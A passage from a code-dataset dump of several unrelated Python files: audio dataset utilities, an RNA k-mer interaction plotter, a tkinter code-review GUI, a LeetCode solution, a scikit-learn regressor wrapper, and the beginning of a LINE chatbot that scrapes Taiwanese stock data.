`df.columns`\n\n Example:\n >>> import pandas as pd\n >>> df = pd.DataFrame(data=[(1, 2)], columns=['a', 'b'])\n >>> ensure_df_columns_contain(df, ['a', 'c'])\n Traceback (most recent call last):\n RuntimeError: Dataframe contains only these columns: 'a, b'\n\n \"\"\"\n ensure_df_not_empty(df)\n if labels is not None and not set(labels) <= set(df.columns):\n raise RuntimeError(\n f\"Dataframe contains only these columns: '{', '.join(df.columns)}'\"\n )\n\n\ndef ensure_df_not_empty(\n df,\n labels=None,\n):\n r\"\"\"Raise error if dataframe is empty.\n\n Args:\n df (pandas.dataframe): data frame\n labels (list of str, optional): list of labels used to shrink data\n set. Default: `None`\n\n Example:\n >>> import pandas as pd\n >>> df = pd.DataFrame()\n >>> ensure_df_not_empty(df)\n Traceback (most recent call last):\n RuntimeError: No valid data points found in data set\n\n \"\"\"\n error_message = 'No valid data points found in data set'\n if labels is not None:\n error_message += f\" for the selected labels: {', '.join(labels)}\"\n if len(df) == 0:\n raise RuntimeError(error_message)\n\n\ndef files_and_labels_from_df(\n df,\n *,\n column_labels=None,\n column_filename='filename',\n):\n r\"\"\"Extract list of files and labels from dataframe columns.\n\n Args:\n df (pandas.DataFrame): data frame with filenames and labels\n column_labels (str or list of str, optional): name of data frame\n column(s) containing the desired labels. Default: `None`\n column_filename (str, optional): name of column holding the file\n names. Default: `filename`\n\n Returns:\n tuple:\n * list of str: list of files\n * list of str or list of dicts: list of labels\n\n Example:\n >>> import pandas as pd\n >>> df = pd.DataFrame(data=[('speech.wav', 'speech')],\n ... columns=['filename', 'label'])\n >>> files, labels = files_and_labels_from_df(df, column_labels='label')\n >>> os.path.relpath(files[0]), labels[0]\n ('speech.wav', 'speech')\n\n \"\"\"\n if df is None:\n return [], []\n\n ensure_df_columns_contain(df, [column_filename])\n df = df.copy()\n files = df.pop(column_filename).tolist()\n\n if column_labels is None:\n return files, [''] * len(files)\n\n if isinstance(column_labels, str):\n column_labels = [column_labels]\n ensure_df_columns_contain(df, column_labels)\n df = df[column_labels]\n # Drop empty entries\n df = df.dropna().reset_index(drop=True)\n ensure_df_not_empty(df, column_labels)\n if len(column_labels) == 1:\n # list of strings\n labels = df.values.T[0].tolist()\n else:\n # list of dicts\n labels = df.to_dict('records')\n return files, labels\n\n\ndef _gen_bar_updater(pbar):\n def bar_update(count, block_size, total_size):\n if pbar.total is None and total_size:\n pbar.total = total_size\n progress_bytes = count * block_size\n pbar.update(progress_bytes - pbar.n)\n\n return bar_update\n\n\ndef defined_split(\n dataset,\n split_func,\n):\n r\"\"\"Split data set into desired non-overlapping subsets.\n\n Args:\n dataset (torch.utils.data.Dataset): data set to be split\n split_func (func): function mapping from data set index to subset id,\n :math:`f(\\text{index}) = \\text{subset\\_id}`.\n The target domain of subset ids does not need to cover the\n complete range `[0, 1, ..., (num_subsets - 1)]`\n\n Returns:\n (list of Subsets): desired subsets according to :attr:`split_func`\n\n Example:\n >>> import torch\n >>> from torch.utils.data import TensorDataset\n >>> from audtorch.samplers import buckets_of_even_size\n >>> data = TensorDataset(torch.randn(100))\n >>> lengths = np.random.randint(0, 1000, (100,))\n >>> split_func = buckets_of_even_size(lengths, 5)\n >>> subsets = defined_split(data, split_func)\n >>> [len(subset) for subset in subsets]\n [20, 20, 20, 20, 20]\n\n \"\"\"\n subset_ids = [split_func(i) for i in range(len(dataset))]\n unique_subset_ids = sorted(set(subset_ids))\n num_subsets = len(unique_subset_ids)\n\n split_indices = [[] for _ in range(num_subsets)]\n\n for i, subset_id in enumerate(subset_ids):\n # handle non-coherent target domain\n subset_id = unique_subset_ids.index(subset_id)\n split_indices[subset_id] += [i]\n\n return [Subset(dataset, indices)\n for indices in split_indices]\n\n\ndef safe_path(\n path,\n):\n \"\"\"Ensure the path is absolute and doesn't include `..` or `~`.\n\n Args:\n path (str): absolute or relative path\n\n Returns:\n str: absolute path\n\n \"\"\"\n return os.path.abspath(os.path.expanduser(path))\n","repo_name":"audeering/audtorch","sub_path":"audtorch/datasets/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12541,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"21"} +{"seq_id":"15351313919","text":"__license__ = \"MIT\"\n__version__ = \"0.9.6\"\n__authors__ = [\"Marvin Jens\"]\n__email__ = \"mjens@mit.edu\"\n\nimport sys\nimport itertools\nimport numpy as np\nimport copy\nimport time\nimport os\nimport logging\nimport collections\nimport RBPamp.cyska\nimport matplotlib\n#matplotlib.use('pdf')\nimport matplotlib.pyplot as pp\n\nfrom RBPamp.caching import cached, pickled, CachedBase\nfrom RBPamp.rbns_reads import RBNSReads\nfrom RBPamp.rbns_analysis import RBNSAnalysis\nfrom RBPamp.ska_runner import SKARunner\n\n\nclass PairInteractionScreen(object):\n def __init__(self, res, core, k_int, pseudo=10.):\n self.res = res\n self.core = core\n self.k_int = k_int\n self.k_core = len(core)\n \n #print \"scanning flanking {0}-mers\".format(k_int)\n pd_matrix, pd_mask = self.res.pd_reads.kmer_flank_profiles(core, k_int)\n in_matrix, in_mask = self.res.in_reads.kmer_flank_profiles(core, k_int)\n\n self.core_density_pd = pd_mask.sum(axis=0)\n self.core_density_bg = in_mask.sum(axis=0)\n \n pd_matrix = np.array(pd_matrix, dtype=np.float32) + pseudo\n in_matrix = np.array(in_matrix, dtype=np.float32) + pseudo\n\n obsv = pd_matrix / pd_matrix.sum(axis=0)[np.newaxis,:]\n bgnd = in_matrix / in_matrix.sum(axis=0)[np.newaxis,:]\n\n # Kullback-Leibler (KL) divergence terms\n self._KL = (obsv * np.log2(obsv / bgnd) )\n # and per-position KL\n self.KL = self._KL.sum(axis=0)\n self.log_ratios = np.log2(obsv / bgnd)\n\n # mask positions overlapping with the core motif\n self.l = self.res.pd_reads.L - self.k_core\n self.KL[self.l-self.k_int+1:self.l+self.k_core] = 0\n self.log_ratios[:,self.l-self.k_int+1:self.l+self.k_core] = 0\n #print \"mask\",self.l-self.k_int+1,self.l+self.k_core \n #print \"log_ratios after masking\", self.log_ratios[:,self.l-self.k_int+1:self.l+self.k_core]\n\n def top_interactors(self, n_top=10):\n #TODO: cook a set of candidate interacting kmers from significance for now let's just take top 10\n top_i = self._KL.max(axis=1).argsort()[::-1][:n_top]\n # and sort alphabetically to ensure reproducibility across successive runs\n top_i = sorted(top_i)\n top_kmers = [cyska.index_to_seq(i, self.k_int) for i in top_i]\n #print \"top interacting kmer candidate list\", top_kmers\n return top_i, top_kmers\n \n def make_plot(self, fname, n_top=10):\n import matplotlib as mp\n mp.rcParams['font.family'] = 'Arial'\n mp.rcParams['font.size'] = 8\n mp.rcParams['font.sans-serif'] = 'Arial'\n mp.rcParams['legend.fontsize'] = 'small'\n mp.rcParams['legend.frameon'] = False\n #mp.rcParams['axes.labelsize'] = 8\n \n import matplotlib.pyplot as pp\n fig = pp.figure()\n fig.subplots_adjust(hspace=0.5)\n \n pp.title(\"{self.res.pd_reads.rbp_name}@{self.res.pd_reads.rbp_conc}nM {self.core} interacting with {self.k_int}-mers\".format(self=self))\n pp.subplot(311)\n pp.gca().set_title(\"density of {0} core\".format(self.core.upper()))\n pp.plot(self.core_density_pd, drawstyle='steps-mid', label=\"pd\")\n pp.plot(self.core_density_bg, drawstyle='steps-mid', label=\"in\")\n pp.gca().locator_params(axis='y',nbins=3)\n pp.gca().locator_params(axis='x',nbins=10)\n\n pp.legend(loc='upper left')\n pp.xlabel(\"read start pos [nt]\")\n pp.ylabel(\"frequency\")\n \n pp.subplot(312)\n pp.title(\"Kullback-Leibler divergence of flanking kmer composition\")\n x = np.arange(len(self.KL)) - len(self.KL)/2 +1.\n pp.plot(x,self.KL, drawstyle='steps-mid', label=\"{0}mers around {1}\".format(self.k_int, self.k_core) )\n pp.xlim(-self.l-.5,self.l+.5)\n pp.xlabel(\"rel. {0}-mer start pos [nt]\".format(self.k_int))\n pp.ylabel(\"KL [bits]\")\n \n pp.subplot(313)\n pp.gca().set_title(\"enriched {0}-mers\".format(self.k_int))\n top_i, top_kmers = self.top_interactors(n_top = n_top)\n z = self.log_ratios[top_i[::-1],:]\n y, x = np.mgrid[slice(0, len(top_i)+1),slice(-(self.l+.5), +self.l+1)]\n \n # symmetric, dynamic range of colorbar\n dr = np.fabs(z).max()\n pp.pcolor(x,y,z, cmap=pp.get_cmap('seismic'), vmin=-dr, vmax=dr)\n\n pp.yticks(np.arange(len(top_i))+.5, top_kmers[::-1]) # reverse order of kmers so pcolor is not upside down\n pp.xlim(-self.l-.5,self.l+.5)\n cbar = pp.colorbar(orientation=\"horizontal\", fraction=0.1, shrink=0.75, label=r\"$\\log_2( \\frac{pd}{in} )$\")\n cbar.ax.tick_params(labelsize=8)\n pp.savefig(fname)\n pp.close()\n \n","repo_name":"RomoL2/RegVar","sub_path":"inst/extdata/RBPamp/RBPamp/kmer_interactions.py","file_name":"kmer_interactions.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"28438467975","text":"from tkinter import *\nfrom tkinter import ttk\nfrom Resources.cut_paste_rename import list_files\nfrom typing import Dict\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom String_match.partial_ratio import *\n\nsize = '1440x810'\n# 分辨率\nmy_dpi = 96\n# 图大小\nplt.figure(figsize=(480 / my_dpi, 480 / my_dpi), dpi=my_dpi)\nplt.rcParams['font.sans-serif'] = ['SimHei'] # 用黑体显示中文\nplt.rcParams['axes.unicode_minus'] = False # 正常显示负号\n\nnoData = '暂无数据!'\nyesStr = '已判为面向用例'\nnoStr = '已判为正常作答'\n\n\ndef getColor(string):\n if string is None:\n return 'b'\n elif string == noStr:\n return 'g'\n elif string == yesStr:\n return 'r'\n else:\n return 'b'\n\n\nclass users:\n if_else_dict: dict\n partial_ratioDict: Dict[str, Partial_ratio]\n partial_ratio: Partial_ratio\n jsonParser: JsonParser\n manualDict: dict\n\n def __init__(self, path, jsonParser, ifelseDict):\n self.root = Tk()\n self.jsonParser = jsonParser\n self.panedWindow = PanedWindow(self.root)\n self.panedWindow.pack(side='left')\n # 左边那个栏\n\n self.partial_ratio = Partial_ratio('', jsonParser)\n self.basePATH = path\n self.root.title(path)\n self.root.geometry(size)\n\n self.if_else_dict = ifelseDict\n\n with open(self.basePATH + '\\\\manual inspection.json', 'r+', encoding='utf8') as ff:\n if ff.read() == '':\n ff.write('{}')\n\n self.manualDict = eval(open(path + '\\\\manual inspection.json', encoding='utf8').read())\n\n self.chartButton = ttk.Button(self.panedWindow, text='show chart', command=self.showStringMatchChart)\n self.chartButton.pack()\n\n self.ifelseChartButton = ttk.Button(self.panedWindow, text='if else', command=self.showIfElseChart)\n self.ifelseChartButton.pack()\n\n self.redShowButton = ttk.Button(self.panedWindow, text='标记可疑字符', command=self.refreshTextColor,\n state='disabled')\n self.redShowButton.pack()\n\n self.yes_no_Button = ttk.Button(self.panedWindow, text=noData, command=self.changeCommentStateByMouse,\n state='disabled')\n self.yes_no_Button.pack()\n self.yes_no_Button.bind_all('', self.changeCommentStateByKeyBoard)\n self.yes_no_Button.bind_all('', self.changeCommentStateByKeyBoard)\n\n self.extractButton = ttk.Button(self.panedWindow, text='数据提取', command=self.extractAction, state='disabled')\n self.extractButton.pack()\n\n self.userListBox = Listbox(self.panedWindow, width=18, height=30)\n self.userPathList = [item for item in list_files(path)\n if item.endswith(\".py\") and not item.endswith('answer.py')]\n [self.userListBox.insert(self.userListBox.size(), str(item).split('\\\\')[3][5:-3])\n for item in self.userPathList]\n self.userListBox.bind('', self.userCallOn)\n self.userListBox.pack()\n self.true_answer_button = ttk.Button(self.panedWindow, text='answer', command=self.answerAction)\n self.true_answer_button.pack()\n self.readmeButton = ttk.Button(self.panedWindow, text='readme', command=self.readmeAction)\n self.readmeButton.pack()\n self.test_case_button = ttk.Button(self.panedWindow, text='test-cases', command=self.testCaseAction)\n self.test_case_button.pack()\n self.textView = Text(self.root, width=150, height=54, state='disabled')\n self.textView.pack()\n\n self.partial_ratioDict = self.__initRatioDict()\n\n def __initRatioDict(self):\n result = dict()\n for path in self.userPathList:\n print(path)\n code = open(path, encoding='utf8').read()\n partial_ratio = Partial_ratio(code=code, jsonParser=self.jsonParser)\n result[path] = partial_ratio\n return result\n\n def refreshTextByFile(self, file):\n path = self.basePATH + '\\\\' + file\n self.refreshTextByPath(path)\n pass\n\n def refreshTextByPath(self, path):\n textStr = open(path, encoding='utf8').read()\n self.refreshTextByString(textStr)\n pass\n\n def refreshTextByString(self, string):\n self.textView.configure(state='normal')\n self.textView.delete(0.0, END)\n self.textView.insert(0.0, string)\n self.textView.configure(state='disabled')\n pass\n\n def refreshTextColor(self):\n color = 'red' # 字体红色\n aList = self.partial_ratio.inData[1] # 输入数据的下标\n bList = self.partial_ratio.outData[1] # 输出的\n aList += bList\n aList.sort(key=lambda x: x[0])\n targetLines = list(set([i[0] for i in aList]))\n\n print('可疑字符串的下标=', aList)\n text_content = (self.textView.get(\"0.0\", \"end\"))\n # print(text_content)\n text_content_list = text_content.split('\\n')\n print(text_content_list)\n print('=' * 6766)\n ptrINput = 0\n ptrOutput = 0\n for i in range(len(text_content_list)):\n if i + 1 in targetLines:\n while ptrINput < len(aList) and aList[ptrINput][0] == i + 1:\n pos = str(i + 1) + '.'\n self.textView.tag_add('tag', pos + str(aList[ptrINput][1]), pos + str(aList[ptrINput][2]))\n self.textView.tag_config('tag', background='yellow', foreground=color)\n self.textView.insert(pos + str(aList[ptrINput][1]), text_content_list[i] + '\\n', 'tag')\n ptrINput += 1\n else:\n pos = str(i + 1) + '.0'\n self.textView.insert(pos, text_content_list[i] + '\\n', 'tag')\n\n # print(self.textView.get(\"0.0\", \"end\"))\n\n def readUserYN(self):\n a = self.userPathList[self.userListBox.curselection()[0]]\n result = self.manualDict.get(a)\n if result is None:\n return noData\n else:\n return result\n\n def changeCommentStateByMouse(self):\n oldString = self.yes_no_Button['text']\n if oldString == noData or oldString == noStr:\n newString = yesStr\n else:\n newString = noStr\n\n self.yes_no_Button['text'] = newString\n self.writeUserYN(newString)\n\n def changeCommentStateByKeyBoard(self, event):\n if str(self.yes_no_Button['state']) == 'disabled':\n return\n\n newString = noData\n if event.char == 'm':\n newString = yesStr\n elif event.char == 'n':\n newString = noStr\n\n self.yes_no_Button['text'] = newString\n self.writeUserYN(newString)\n\n def writeUserYN(self, newString):\n a = self.userPathList[self.userListBox.curselection()[0]]\n self.manualDict[a] = newString\n\n with open(self.basePATH + '\\\\manual inspection.json', 'w', encoding='utf8') as ff:\n ff.write(str(self.manualDict))\n\n def gotoUserState(self):\n self.redShowButton.configure(state='normal')\n self.extractButton.configure(state='normal')\n self.yes_no_Button.configure(state='normal')\n\n def exitUserState(self):\n self.redShowButton.configure(state='disabled')\n self.extractButton.configure(state='disabled')\n self.yes_no_Button.configure(state='disabled')\n\n def userCallOn(self, event):\n my_path = self.userPathList[self.userListBox.curselection()[0]]\n code = open(my_path, encoding='utf8').read()\n self.partial_ratio = self.partial_ratioDict.get(my_path)\n self.refreshTextByString(code)\n self.gotoUserState()\n self.yes_no_Button['text'] = self.readUserYN()\n pass\n\n def answerAction(self, ):\n self.refreshTextByFile('answer.py')\n self.exitUserState()\n pass\n\n def readmeAction(self):\n self.refreshTextByFile('readme.md')\n self.exitUserState()\n pass\n\n def testCaseAction(self):\n self.refreshTextByFile('testCases.json')\n self.exitUserState()\n pass\n\n def extractAction(self):\n self.refreshTextByString(self.partial_ratio.extracter.afterExtractCode)\n pass\n\n @staticmethod\n def showChart(height, bars, colorList):\n height = [i if i > 0 else float(0.0267) for i in height]\n y_pos = np.arange(len(bars))\n plt.ylim((0, 1))\n plt.bar(y_pos, height, color=colorList)\n plt.xticks(y_pos, bars, rotation=270)\n plt.show()\n\n def showStringMatchChart(self):\n # height\n keys = [i for i in self.partial_ratioDict.keys()]\n keys.sort(key=lambda i: (self.partial_ratioDict.get(i).inData[0]*self.partial_ratioDict.get(i).inData[2]+self.partial_ratioDict.get(i).outData[0]*self.partial_ratioDict.get(i).outData[2])/(self.partial_ratioDict.get(i).inData[2]+self.partial_ratioDict.get(i).outData[2]))\n\n height = [(self.partial_ratioDict.get(i).inData[0]*self.partial_ratioDict.get(i).inData[2]+self.partial_ratioDict.get(i).outData[0]*self.partial_ratioDict.get(i).outData[2])/(self.partial_ratioDict.get(i).inData[2]+self.partial_ratioDict.get(i).outData[2]) for i in keys]\n\n bars = [(i.split('\\\\')[-1]).split('_')[1] for i in keys]\n\n colorList = [getColor(self.manualDict.get(i)) for i in keys]\n self.showChart(height, bars, colorList)\n\n def showIfElseChart(self):\n if not self.if_else_dict:\n return\n keys = [i for i in self.if_else_dict.keys()]\n keys.sort(key=lambda i: self.if_else_dict.get(i)[0])\n height = [float(self.if_else_dict.get(i)[0]) for i in keys]\n bars = keys\n\n tmpDict = dict()\n for i in self.manualDict.keys():\n ii = i.split('\\\\')[3].split('_')[1]\n tmpDict[ii] = i\n colorList = [getColor(self.manualDict.get(tmpDict.get(i))) for i in keys]\n self.showChart(height, bars, colorList)\n","repo_name":"huangmengbin/UserCase-Oriented-Detection","sub_path":"gui/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":9944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28502995521","text":"# 973. K Closest Points to Origin\n\n# We have a list of points on the plane. Find the K closest points to\n# the origin (0, 0).\n\n# (Here, the distance between two points on a plane is the Euclidean\n# distance.)\n\n# You may return the answer in any order. The answer is guaranteed to\n# be unique (except for the order that it is in.)\n\n# Example 1:\n# Input: points = [[1,3],[-2,2]], K = 1\n# Output: [[-2,2]]\n# Explanation:\n# The distance between (1, 3) and the origin is sqrt(10).\n# The distance between (-2, 2) and the origin is sqrt(8).\n# Since sqrt(8) < sqrt(10), (-2, 2) is closer to the origin.\n# We only want the closest K = 1 points from the origin, so the answer is just [[-2,2]].\n\n# Example 2:\n# Input: points = [[3,3],[5,-1],[-2,4]], K = 2\n# Output: [[3,3],[-2,4]]\n# (The answer [[-2,4],[3,3]] would also be accepted.)\n\n# Note:\n# 1 <= K <= points.length <= 10000\n# -10000 < points[i][0] < 10000\n# -10000 < points[i][1] < 10000\n\nfrom typing import List\n\n\nclass Solution:\n def calcDistances(self, points):\n import math\n res = []\n for x, y in points: res.append([math.sqrt(x**2 + y**2), x, y])\n return res\n\n def randomize(self, points):\n import random\n for i in range(len(points) - 1, 0, -1):\n r = int(random.random() * i)\n points[i], points[r] = points[r], points[i]\n return points\n\n def partition(self, points, start, end):\n pv = points[start][0]\n points[start], points[end] = points[end], points[start]\n p = start\n for i in range(start, end):\n if points[i][0] < pv:\n points[p], points[i] = points[i], points[p]\n p += 1\n points[p], points[end] = points[end], points[p]\n return p\n\n def kClosest(self, points: List[List[int]], K: int) -> List[List[int]]:\n if K >= len(points): return points\n pd = self.randomize(self.calcDistances(points))\n l, r = 0, len(points) - 1\n p = self.partition(pd, l, r)\n while p != K:\n if p < K: l = p + 1\n else: r = p - 1\n p = self.partition(pd, l, r)\n\n res = []\n for i, p in enumerate(pd):\n if i == K: break\n res.append(p[1:])\n return res\n\nt = Solution()\n\n\nprint(\"[[0,2],[-3,3],[-2,5]] =|= \", t.kClosest([[6,10],[-3,3],[-2,5],[0,2]], 3))\nprint(\"[[-2,2]] =|= \", t.kClosest([[1,3],[-2,2]], 1))\nprint(\"[[3,3],[-2,4]] =|= \", t.kClosest([[3,3],[5,-1],[-2,4]], 2))\nprint(\"[[3,3],[5,-1],[-2,4]] =|= \", t.kClosest([[3,3],[5,-1],[-2,4]], 3))","repo_name":"DmitryVlaznev/leetcode","sub_path":"973-k-closest-points-to-origin.py","file_name":"973-k-closest-points-to-origin.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"18288376877","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 16 17:03:39 2021\n\n@author: bdobkowski\n\"\"\"\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge, RidgeCV\nfrom sklearn.linear_model import Lasso, LassoCV\nfrom sklearn.linear_model import PoissonRegressor\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.svm import SVR\n\nclass Regressor:\n \"\"\"Regressor\n\n Example usage:\n > reg = Regressor('LinearRegression')\n > reg.fit(x_train, y_train)\n > reg.predict(x_eval)\n \"\"\"\n def __init__(self, model_type='LinearRegression'):\n \"\"\"\n\n \"\"\"\n self.model_type = model_type\n \n if model_type == 'LinearReg':\n self.model = LinearRegression(fit_intercept=True)\n elif model_type == 'Ridge':\n self.model = Ridge(fit_intercept=True)\n elif model_type == 'Lasso':\n self.model = Lasso(fit_intercept=True)\n elif model_type == 'SVR':\n self.model = SVR(kernel='poly',\n degree=3,\n gamma='scale',\n epsilon=0.1,\n C=1.0,\n max_iter=1000)\n elif model_type == 'Poisson':\n self.model = PoissonRegressor(max_iter=10000)\n elif model_type == 'RandomForest':\n self.model = RandomForestRegressor(max_depth=2, random_state=0)\n elif model_type == 'Baseline':\n self.model = LinearRegression(fit_intercept=True)\n else:\n raise Exception('Model does not exist in regressor class')\n\n def fit(self, x, y):\n self.model.fit(x, y)\n \n def predict(self, x):\n return self.model.predict(x)\n \n def fit_cv(self, x, y):\n \"\"\" Cross Validation via GridSearch, RandomizedSearch\n \"\"\"\n if self.model_type == 'LinearReg':\n w = np.exp(-(y-50)**2/1000)\n self.model_cv = self.model\n self.model_cv.fit(x, y, sample_weight=w)\n return\n \n elif self.model_type == 'Baseline':\n self.model_cv = self.model\n self.model_cv.fit(x, y)\n return\n \n elif self.model_type == 'Ridge':\n self.model_cv = RidgeCV(alphas=(np.linspace(0.1,10.0,num=30)),\n fit_intercept=True).fit(x, y)\n \n # self.model_cv = Ridge(alpha=10.0,\n # fit_intercept=True).fit(x, y)\n \n # ['additive_chi1', 'chi2', 'linear', 'poly', 'polynomial', 'rbf', 'laplacian', 'sigmoid', 'cosine']\n # params = {'kernel':['rbf','linear'],\n # 'alpha':np.linspace(0.1,10.0,num=30),\n # 'gamma':[0.1, 0.01, 0.4, 0.7]}\n \n # self.model_cv = GridSearchCV(estimator=KernelRidge(), \n # param_grid=params, \n # scoring='neg_mean_squared_error').fit(x,y)\n return\n \n elif self.model_type == 'Lasso':\n self.model_cv = LassoCV(alphas=(np.linspace(0.01,10.0,num=100)),\n fit_intercept=True).fit(x, y)\n return\n \n elif self.model_type == 'SVR':\n # params = {'kernel':['poly','rbf','linear','sigmoid'],\n # 'C':np.logspace(-2,2,num=40),\n # 'gamma':['scale'],\n # 'max_iter':[-1],\n # 'degree':[1,2,3,4]}\n \n # self.model_cv = GridSearchCV(estimator=self.model, \n # param_grid=params, \n # scoring='neg_mean_squared_error').fit(x,y)\n \n self.model_cv = SVR(C=0.21544346900318834, \n degree=1, \n kernel='linear',\n cache_size=200,\n max_iter=-1,\n epsilon=0.1).fit(x, y)\n return\n \n elif self.model_type == 'Poisson':\n params = {'alpha':np.linspace(0.01,10,100),\n 'max_iter':[100000]}\n \n self.model_cv = GridSearchCV(estimator=self.model, \n param_grid=params, \n scoring='neg_mean_squared_error').fit(x,y)\n return\n \n elif self.model_type == 'RandomForest':\n params = {'bootstrap': [True, False],\n 'max_depth': [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, None],\n 'max_features': ['auto', 'sqrt'],\n 'min_samples_leaf': [1, 2, 3, 4],\n 'min_samples_split': [2, 4, 6, 8, 10],\n 'n_estimators': [200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000]}\n \n self.model_cv = RandomizedSearchCV(estimator = self.model, \n param_distributions = params, \n n_iter = 200, \n cv = 3, \n verbose=1, \n random_state=42, \n n_jobs = -1).fit(x,y)\n return\n ","repo_name":"bdobkowski/2020_Olympics_Predictions","sub_path":"regressors.py","file_name":"regressors.py","file_ext":"py","file_size_in_byte":5562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39961650474","text":"import os\nimport json\n\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport pandas as pd\n\nimport twstock\n\nfrom flask import Flask, request, abort\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\n\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\n\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n)\n\napp = Flask(__name__)\n\n# LINE Chatbot token\nLINE_CHANNEL_ACCESS_TOKEN = os.environ.get('LINE_CHANNEL_ACCESS_TOKEN')\nLINE_CHANNEL_SECRET = os.environ.get('LINE_CHANNEL_SECRET')\nline_bot_api = LineBotApi(LINE_CHANNEL_ACCESS_TOKEN)\nhandler = WebhookHandler(LINE_CHANNEL_SECRET)\n\ndef getStockPrice(stockno):\n stock = twstock.realtime.get(stockno)['realtime']\n stockpricestr = ''\n stockpricestr += '開盤價'+ '{:.2f}'.format(float(stock['open'])) + '\\n'\n stockpricestr += '最高價'+ '{:.2f}'.format(float(stock['high'])) + '\\n'\n stockpricestr += '最低價'+ '{:.2f}'.format(float(stock['low'])) + '\\n'\n stockpricestr += '收盤價'+ '{:.2f}'.format(float(stock['latest_trade_price']))\n return stockpricestr\n\ndef getRevenue(stockno):\n url = f\"http://jsjustweb.jihsun.com.tw/z/zc/zch/zch_{stockno}.djhtm\"\n res = requests.get(url)\n soup = bs(res.text, 'lxml')\n tb = soup.select('table')[2]\n df = pd.read_html(tb.prettify(), header = 5)\n\n stockrevenue = ''\n stockrevenue += '年月 ' + str(df[0].iloc[0, 0]) + '%\\n'\n stockrevenue += '營收 ' + str(df[0].iloc[0, 1]) + '仟元\\n'\n stockrevenue += '月增率 ' + str(df[0].iloc[0, 2]) + '%\\n'\n stockrevenue += '去年同期 ' + str(df[0].iloc[0, 3]) + '仟元\\n'\n stockrevenue += '年增率 ' + str(df[0].iloc[0, 4]) + '%\\n'\n stockrevenue += '累計營收 ' + str(df[0].iloc[0, 5]) + '仟元\\n'\n stockrevenue += '累計營收年增率 ' + str(df[0].iloc[0, 6]) + '%\\n'\n return stockrevenue\n\ndef getCredittransaction(stockno):\n url = f'https://goodinfo.tw/StockInfo/ShowBearishChart.asp?STOCK_ID={stockno}&CHT_CAT=DATE'\n headers = {\n 'referer': 'https://goodinfo.tw/',\n 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'\n }\n res = requests.get(url, headers = headers)\n res.encoding = 'utf8'\n soup = bs(res.text, 'lxml')\n cells = soup.select('.solid_1_padding_4_2_tbl td')\n strtext = ''\n strtext += '融資增減 ' + cells[23].text + '\\n'\n strtext += '融資使用率 ' + cells[25].text + '\\n'\n strtext += '融券增減 ' + cells[39].text + '\\n'\n strtext += '融券使用率 ' + cells[41].text + '\\n'\n return strtext\n\ndef getStockDayTrade(stockno):\n url = f'https://goodinfo.tw/StockInfo/DayTrading.asp?STOCK_ID={stockno}'\n headers = {\n 'referer': 'https://goodinfo.tw/',\n 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'\n }\n res = requests.get(url, headers = headers)\n res.encoding = 'utf8'\n soup = bs(res.text, 'lxml')\n cells = soup.select('#divDayTradingDetail td')\n strtext = ''\n strtext += '成交張數當沖 ' + cells[25].text + ' %\\n'\n strtext += '當沖總損益(萬元) ' + cells[30].text + '\\n'\n strtext += '當沖均損益(元/張) ' + cells[31].text + '\\n'\n return strtext\n\ndef getOperatingProfit(stockno, year, season):\n url = f'https://mops.twse.com.tw/mops/web/ajax_t163sb06?step=1&firstin=1&&TYPEK=sii&year={year}&season={season}'\n res = requests.get(url)\n soup = bs(res.text, 'lxml')\n tb = soup.select('.hasBorder')[0]\n dfsii = pd.read_html(tb.prettify(), header = 0)[0]\n\n url = f'https://mops.twse.com.tw/mops/web/ajax_t163sb06?step=1&firstin=1&&TYPEK=otc&year={year}&season={season}'\n res = requests.get(url)\n soup = bs(res.text, 'lxml')\n tb = soup.select('.hasBorder')[0]\n dfotc = pd.read_html(tb.prettify(), header = 0)[0]\n\n df = pd.concat([dfsii, dfotc], ignore_index = True)\n df['公司代號'] = df['公司代號'].astype(str)\n strtext = ''\n if len(df[df['公司代號'] == stockno]) > 0:\n index = df[df['公司代號'] == stockno].index[0]\n strtext += '營業收入 (百萬元) ' + str(df.iloc[index, 2]) + '\\n'\n strtext += '毛利率(%) (營業毛利) / (營業收入) ' + str(df.iloc[index, 3]) + '\\n'\n strtext += '營業利益率(%) (營業利益)/ (營業收入) ' + str(df.iloc[index, 4]) + '\\n'\n strtext += '稅前純益率(%) (稅前純益)/ (營業收入) ' + str(df.iloc[index, 5]) + '\\n'\n strtext += '稅後純益率(%) (稅後純益)/ (營業收入) ' + str(df.iloc[index, 6]) + '\\n'\n else:\n strtext += f'此檔{stockno}股票尚未公告{year}/{season}的營益分析資料,請重新查詢!!'\n return strtext\n\ndef Help():\n strtext = '''\n 請輸入以下指令查詢:\\n\n 股計查詢:@/[股票代碼]\n ex: @2330\\n\n 營收/[股票代碼]\n ex: 營收/2330\\n\n 資券/[股票代碼]\n ex: 資券/2330\\n\n 現股當沖/[股票代碼]\n ex: 現股當沖/2330\\n\n 營益分析/[股票代碼]/[年度]/[季別]\n ex: 營益分析/2330/109/1\\n\n '''\n return strtext \n\n\n@app.route(\"/\", methods=['GET'])\ndef hello():\n return 'hello 